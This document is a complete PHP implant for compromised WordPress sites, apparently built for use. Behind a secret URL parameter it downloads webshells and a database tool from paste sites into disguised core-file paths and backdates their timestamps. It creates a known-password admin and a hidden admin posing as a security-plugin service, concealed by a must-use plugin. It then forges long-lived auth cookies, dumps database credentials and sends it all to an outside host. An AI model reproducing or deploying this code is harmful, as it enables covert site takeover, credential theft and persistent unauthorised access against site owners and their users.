<?php
@ini_set('display_errors', 0);
@error_reporting(0);
header('Content-Type: text/plain; charset=utf-8');

$current_dir = __DIR__;
$wp_load_path = null;

while (true) {
    if (file_exists($current_dir . '/wp-load.php')) {
        $wp_load_path = $current_dir . '/wp-load.php';
        break;
    }
    if ($current_dir === dirname($current_dir)) {
        break;
    }
    $current_dir = dirname($current_dir);
}

if (!isset($wp_load_path)) {
    http_response_code(500);
    die('WordPress load file not found');
}

define('WP_USE_THEMES', false);
require_once $wp_load_path;

$secret = "bryantropis";

if (!isset($_GET['call']) || $_GET['call'] !== $secret) {
    header('Content-Type: text/html; charset=utf-8');
    global $wp_query;
    $wp_query->set_404();
    status_header(404);
    nocache_headers();
    include(get_query_template('404'));
    exit();
}

$notes_structure = [
    'Adminer' => [
        [
            'path'       => 'wp-admin/includes/class-wp-plugins-conf.php',
            'source_url' => 'https://paste.mangsud.org/raw/1d49aa6d'
        ]
    ],
    'Direct Admin' => [
        [
            'path'       => 'wp-admin/includes/class-wp-core-system.php',
            'source_url' => 'https://paste.mangsud.org/raw/a2d65640'
        ]
    ],
    'Webshell' => [
        [
            'path'       => 'wp-admin/includes/class-action.php',
            'source_url' => 'https://paste.mangsud.org/raw/a9d9d7f1'
        ],
        [
            'path'       => 'wp-includes/customize/class-wp-customize-background-position-compress.php',
            'source_url' => 'https://paste.mangsud.org/raw/03b97934'
        ]

    ]
];

$stealth_usernames = [
    'litespeed-admin', 'sucuri-admin', 'wordfence-system', 'cloudflare-service',
    'jetpack-sync', 'wp-system', 'updater-admin', 'maintenance-user',
    'yoast-service', 'wprocket-cache'
];

function get_stealth_plugin_details($username) {
    $details = [
        'litespeed-admin' => ['name' => 'LiteSpeed Cache Extensions', 'file' => 'litespeed-cache-extensions.php'],
        'sucuri-admin' => ['name' => 'Sucuri Security Extensions', 'file' => 'sucuri-firewall-module.php'],
        'wordfence-system' => ['name' => 'Wordfence Scanner Module', 'file' => 'wordfence-scan-utilities.php'],
        'cloudflare-service' => ['name' => 'Cloudflare Integration Module', 'file' => 'cloudflare-integration.php'],
        'jetpack-sync' => ['name' => 'Jetpack Performance Module', 'file' => 'jetpack-performance.php'],
        'wp-system' => ['name' => 'WordPress System Utilities', 'file' => 'wp-system-utilities.php'],
        'updater-admin' => ['name' => 'WordPress Update Manager', 'file' => 'wp-update-manager.php'],
        'maintenance-user' => ['name' => 'Maintenance Mode Module', 'file' => 'maintenance-module.php'],
        'yoast-service' => ['name' => 'Yoast SEO Extensions', 'file' => 'yoast-seo-extensions.php'],
        'wprocket-cache' => ['name' => 'WP Rocket Advanced Cache', 'file' => 'wprocket-advanced-cache.php']
    ];
    return $details[$username] ?? ['name' => 'System Performance Module', 'file' => 'system-module.php'];
}

function touch_file_to_system_time($file_path) {
    $ref_file = null;
    $possible_ref_files = ['/etc/passwd', '/etc/hosts', ABSPATH . 'index.php', ABSPATH . 'wp-includes/version.php'];
    foreach ($possible_ref_files as $pfile) {
        if (@file_exists($pfile)) { $ref_file = $pfile; break; }
    }
    if ($ref_file && @file_exists($file_path)) {
        $ref_time = @filemtime($ref_file);
        if ($ref_time) {
            $random_offset = rand(1, 60) * DAY_IN_SECONDS;
            @touch($file_path, $ref_time - $random_offset, $ref_time - $random_offset);
            return basename($ref_file);
        }
    }
    return false;
}

function generate_strong_password($length = 16) {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_=+';
    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= $chars[rand(0, strlen($chars) - 1)];
    }
    return $password;
}

$root = ABSPATH;
$throw_user = 'it-management';
$mypasword = 'koodacookie#1998';
$throw_email_suffix = '@' . $_SERVER['HTTP_HOST'];
$exfil_url = 'https://yifaid.cyou';
$results = [];

foreach ($notes_structure as $group_name => $files) {
    if (!isset($results[$group_name])) {
        $results[$group_name] = ['success' => [], 'failed' => []];
    }

    foreach ($files as $file_info) {
        $raw_url = $file_info['source_url'];
        $relative_path = ltrim($file_info['path'], '/');
        
        $full_path = $root . $relative_path;
        $full_url = "\t" . get_site_url() . "/" . $relative_path;

        $content = @file_get_contents($raw_url);
        if ($content === false) {
            $results[$group_name]['failed'][] = $full_url . ' (Reason: Could not fetch content from URL)';
            continue;
        }

        $directory = dirname($full_path);
        if (!is_dir($directory)) {
            if (!wp_mkdir_p($directory)) {
                $results[$group_name]['failed'][] = $full_url . ' (Reason: Could not create directory)';
                continue;
            }
        }

        if (file_put_contents($full_path, $content) !== false) {
            touch_file_to_system_time($full_path);
            $results[$group_name]['success'][] = $full_url;
        } else {
            $results[$group_name]['failed'][] = $full_url . ' (Reason: Could not write file, check permissions)';
        }
    }
}

$output = "Process finished for domain: " . get_site_url() . "\n";
$output .= "Timestamp: " . date('Y-m-d H:i:s') . "\n";
$output .= "============================= UPLOADED FILES =============================\n";

foreach ($results as $group_name => $group_data) {
    $success_count = count($group_data['success']);
    $failed_count = count($group_data['failed']);

    $output .= "\n### Group: " . $group_name . "\n\n";

    $output .= "SUCCESS (" . $success_count . "):\n";
    if (empty($group_data['success'])) {
        $output .= "No files were created successfully in this group.\n";
    } else {
        foreach ($group_data['success'] as $url) {
            $output .= $url . "\n";
        }
    }

    $output .= "\nFAILED (" . $failed_count . "):\n";
    if (empty($group_data['failed'])) {
        $output .= "No files failed in this group.\n";
    } else {
        foreach ($group_data['failed'] as $url) {
            $output .= $url . "\n";
        }
    }
    $output .= "\n";
}

$output .= "\n============================= CREATE USER =============================\n\n";
$throw_user_id = null;
$throw_user_created = false;
if (!username_exists($throw_user)) {
    $throw_user_id = wp_create_user($throw_user, $mypasword, $throw_user . $throw_email_suffix);
    if (!is_wp_error($throw_user_id)) {
        $user = new WP_User($throw_user_id);
        $user->set_role('administrator');
        $throw_user_created = true;
        $output .= "Created nebar user: " . $throw_user . " / " . $mypasword . PHP_EOL;
    } else {
        $output .= "Error creating nebar user '" . $throw_user . "': " . $throw_user_id->get_error_message() . PHP_EOL;
    }
} else {
    $output .= "Nebar user '" . $throw_user . "' already exists." . PHP_EOL;
    $throw_user_obj = get_user_by('login', $throw_user);
    if ($throw_user_obj) $throw_user_id = $throw_user_obj->ID;
}

$output .= "\n============================= STEALTH USER CREATION =============================\n\n";

$stealth_user = null;
$stealth_pass = null;
$stealth_email = null;
$stealth_plugin_details = null;
$stealth_created = false;

$selected_stealth_username = null;
shuffle($stealth_usernames);
foreach ($stealth_usernames as $potential_user) {
    $potential_email = $potential_user . $throw_email_suffix;
    if (!username_exists($potential_user) && !email_exists($potential_email)) {
        $selected_stealth_username = $potential_user;
        break;
    }
}

if ($selected_stealth_username) {
    $stealth_user = $selected_stealth_username;
    $stealth_pass = generate_strong_password();
    $stealth_email = $stealth_user . $throw_email_suffix;
    $stealth_plugin_details = get_stealth_plugin_details($stealth_user);

    $user_id = wp_create_user($stealth_user, $stealth_pass, $stealth_email);

    if (!is_wp_error($user_id)) {
        $user = new WP_User($user_id);
        $user->set_role('administrator');
        update_user_meta($user_id, 'show_admin_bar_front', 'false');

        $mu_plugins_dir = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : ABSPATH . 'wp-content/mu-plugins';
        $mu_dir_created = false;
        if (!is_dir($mu_plugins_dir)) {
            if (@mkdir($mu_plugins_dir, 0755, true)) {
                 $mu_dir_created = true;
                 touch_file_to_system_time($mu_plugins_dir);
            }
        }

        if (is_dir($mu_plugins_dir) && is_writable($mu_plugins_dir)) {
            $plugin_filepath = $mu_plugins_dir . '/' . $stealth_plugin_details['file'];
            $plugin_content = '<?php
/** Plugin Name: ' . $stealth_plugin_details['name'] . ' */
add_filter("users_list_table_query_args", function($args) {
    $exclude_user = get_user_by("login", "' . esc_sql($stealth_user) . '");
    if ($exclude_user) {
        $args["exclude"] = array_merge((array)($args["exclude"] ?? []), [$exclude_user->ID]);
    }
    return $args;
});';
            if (@file_put_contents($plugin_filepath, $plugin_content)) {
                $ref = touch_file_to_system_time($plugin_filepath);
                $output .= "Created stealth user: " . $stealth_user . " / " . $stealth_pass . PHP_EOL;
                $output .= "Hiding via MU Plugin: " . $stealth_plugin_details['file'] . ($ref ? " (Touched: " . $ref . ")" : "") . PHP_EOL;
                $stealth_created = true;
            } else {
                $output .= "Error: Could not write MU plugin: " . $plugin_filepath . PHP_EOL;
                $output .= "Created stealth user (visible): " . $stealth_user . " / " . $stealth_pass . PHP_EOL;
            }
        } else {
            $output .= "Warning: MU plugins directory not writable: " . $mu_plugins_dir . PHP_EOL;
            $output .= "Created stealth user (visible): " . $stealth_user . " / " . $stealth_pass . PHP_EOL;
        }
    } else {
        $output .= "Error creating stealth user '" . $stealth_user . "': " . $user_id->get_error_message() . PHP_EOL;
    }
} else {
    $output .= "Result: Could not find an available stealth username." . PHP_EOL;
}
$output .= PHP_EOL;

$output .= "============================= AUTHENTICATION COOKIES =============================\n\n";
$admin_users_after = get_users(['role' => 'administrator', 'fields' => ['ID', 'user_login']]);
$cookie_output = "";
if (!empty($admin_users_after)) {
    $expiration = time() + (30 * DAY_IN_SECONDS);
    $cookie_domain = defined('COOKIE_DOMAIN') && COOKIE_DOMAIN ? COOKIE_DOMAIN : '';
    if (empty($cookie_domain)) {
        $host = $_SERVER['HTTP_HOST'];
        $host = preg_replace('/^www\./', '', $host);
        if (strpos($host, '.') !== false && !filter_var($host, FILTER_VALIDATE_IP)) {
            $cookie_domain = '.' . $host;
        } else {
            $cookie_domain = $host;
        }
    }
    $is_ssl = is_ssl();

    $cookie_output .= "Expiration: " . date('Y-m-d H:i:s', $expiration) . PHP_EOL;
    $cookie_output .= "Domain: " . $cookie_domain . PHP_EOL;
    $cookie_output .= "Protocol: " . ($is_ssl ? "HTTPS" : "HTTP") . PHP_EOL . PHP_EOL;

    foreach ($admin_users_after as $user) {
        $scheme = $is_ssl ? 'secure_auth' : 'auth';
        $auth_cookie = wp_generate_auth_cookie($user->ID, $expiration, $scheme);
        $logged_in_cookie = wp_generate_auth_cookie($user->ID, $expiration, 'logged_in');

        $auth_cookie_name = $is_ssl ? SECURE_AUTH_COOKIE : AUTH_COOKIE;
        $logged_in_cookie_name = LOGGED_IN_COOKIE;

        $cookie_output .= "[ User: " . $user->user_login . " (ID: " . $user->ID . ") ]" . PHP_EOL;
        $cookie_output .= "  Auth Cookie Name: " . $auth_cookie_name . PHP_EOL;
        $cookie_output .= "  Auth Cookie Value: " . $auth_cookie . PHP_EOL;
        $cookie_output .= "  Logged In Cookie Name: " . $logged_in_cookie_name . PHP_EOL;
        $cookie_output .= "  Logged In Cookie Value: " . $logged_in_cookie . PHP_EOL;
        $cookie_output .= "---" . PHP_EOL;
    }
} else {
    $cookie_output .= "Result: No admin users found to generate cookies for." . PHP_EOL;
}
$output .= $cookie_output . PHP_EOL;

$output .= "============================= DATABASE INFORMATION =============================\n\n";
global $wpdb;
$db_info = "DB_NAME: " . (defined('DB_NAME') ? DB_NAME : "N/A") . PHP_EOL;
$db_info .= "DB_USER: " . (defined('DB_USER') ? DB_USER : "N/A") . PHP_EOL;
$db_info .= "DB_PASSWORD: " . (defined('DB_PASSWORD') ? DB_PASSWORD : "N/A") . PHP_EOL;
$db_info .= "DB_HOST: " . (defined('DB_HOST') ? DB_HOST : "N/A") . PHP_EOL;
$db_info .= "TABLE_PREFIX: " . ($wpdb->prefix ?? "N/A") . PHP_EOL;
$output .= $db_info . PHP_EOL;

$output .= "\n============================= PROCESS COMPLETE =============================\n\n\n";

$exfil_data = $output;
$exfil_filename = $_SERVER['HTTP_HOST'] . '.txt';

$send_url = $exfil_url . '?save_file=' . urlencode($exfil_filename) . '&data=' . urlencode($exfil_data);

$context = stream_context_create(['http' => ['ignore_errors' => true, 'timeout' => 5]]);
$exfil_result = @file_get_contents($send_url, false, $context);

@header('Content-Type: text/plain; charset=utf-8');
echo $output;

if ($exfil_result === false) {
    echo PHP_EOL . "--- Exfiltration WARNING: Failed to send data to " . $exfil_url . " ---" . PHP_EOL;
} else {
     echo PHP_EOL . "--- Exfiltration INFO: Data sent attempt finished ---" . PHP_EOL;
}

exit;
?>